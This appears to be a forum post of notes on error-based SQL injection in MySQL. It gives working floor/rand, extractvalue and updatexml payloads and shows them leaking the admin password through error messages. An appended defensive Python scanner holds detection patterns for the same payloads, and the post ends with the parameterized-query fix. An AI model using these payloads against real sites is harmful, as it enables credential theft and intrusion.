Posting some old notes. When MySQL executes a statement it throws an error message, and PHP+MySQL sites often display that error text right on the page, so the following three methods can be used to make the error message carry specific data.

Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:

First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version is disclosed in the error message. To retrieve other data, replace the version() part of the statement with the query you want.

For example, to retrieve the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
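From the defender's side, here is an added example (not part of the original post) covering all three techniques above: a small Python scanner that URL-decodes request log lines and flags both the payload shapes (floor(rand(0)*2) with group by, extractvalue and updatexml wrapping concat) and the leaked MySQL error strings seen in the test output. The log lines, IP addresses and file paths in SAMPLE_LOG are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Payload shapes of the three techniques above, matched on URL-decoded, lowercased text.
PAYLOAD_PATTERNS = {
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*?group\s+by"
        r"|group\s+by.*?floor\s*\(\s*rand\s*\(", re.S),
    "extractvalue": re.compile(r"extractvalue\s*\(.*?concat\s*\(", re.S),
    "updatexml": re.compile(r"updatexml\s*\(.*?concat\s*\(", re.S),
}
# Error strings the examples show leaking to the page or log; matched on the raw line.
ERROR_PATTERNS = {
    "dup_entry_group_key": re.compile(r"Duplicate entry '.*' for key 'group_key'"),
    "xpath_syntax_error": re.compile(r"XPATH syntax error: '"),
}

def normalize(text):
    """URL-decode until stable (catches double encoding), then lowercase."""
    prev = None
    while prev != text:
        prev, text = text, unquote_plus(text)
    return text.lower()

def classify(line):
    """Return the technique names matched by one log line (empty if clean)."""
    decoded = normalize(line)
    hits = [name for name, rx in PAYLOAD_PATTERNS.items() if rx.search(decoded)]
    hits += [name for name, rx in ERROR_PATTERNS.items() if rx.search(line)]
    return hits

def scan(lines):
    """Map 1-based line numbers to their matches, skipping clean lines."""
    return {i: h for i, line in enumerate(lines, 1) if (h := classify(line))}

# Constructed sample (made-up addresses and paths): Apache-style access-log lines carrying
# the three payloads from the post, URL-encoded, one benign request, and one PHP error-log line.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /article.php?id=1%20and%20(select%201%20from%20'
    '(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 500 133',
    '10.0.0.9 - - [01/Jan/2020:10:00:03 +0000] "GET /article.php?id=1%20and%20extractvalue(1,'
    'concat(0x5c,(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 500 120',
    '10.0.0.9 - - [01/Jan/2020:10:00:04 +0000] "GET /article.php?id=1%20and%201=(updatexml(1,'
    'concat(0x5e24,(select%20user()),0x5e24),1)) HTTP/1.1" 500 118',
    "[01-Jan-2020 10:00:02] PHP Warning: mysql_query(): Duplicate entry '5.1.33-community-log1'"
    " for key 'group_key' in /var/www/article.php on line 12",
]
```

Call scan(SAMPLE_LOG) to see which line matched which technique. On the application side the fix is the same for all three: stop echoing database errors to the page and pass id through a parameterized query instead of string concatenation.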
That's all, thanks to the foreign guys.